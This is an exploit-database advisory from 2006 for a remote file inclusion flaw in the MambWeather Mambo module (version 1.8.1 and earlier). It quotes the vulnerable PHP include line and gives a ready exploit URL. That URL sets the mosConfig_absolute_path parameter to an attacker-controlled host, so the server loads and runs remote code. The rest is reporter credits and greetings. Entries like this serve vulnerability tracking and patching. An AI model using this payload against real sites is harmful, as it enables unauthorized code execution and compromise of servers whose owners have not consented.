MambWeather Mambo Module <= 1.8.1 Remote Include Vulnerability

2006-10-22T00:00:00
ID 1337DAY-ID-1040
Type zdt
Reporter h4ntu
Modified 2006-10-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
MambWeather Mambo Module <= 1.8.1 Remote Include Vulnerability
==============================================================



Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo module remote inclusion vulneribility

 
bug found in file : MambWeather/Savant2/Savant2_Plugin_options.php
 
 <?php

 /**
 * Base plugin class.
 */
 global $mosConfig_absolute_path;

 require_once $mosConfig_absolute_path.'/modules/MambWeather/Savant2/Plugin.php';

 /**

exploit:

http://[site]/[path_to_mambo]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker ]

Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #[email protected]



#  0day.today [2018-02-09]  #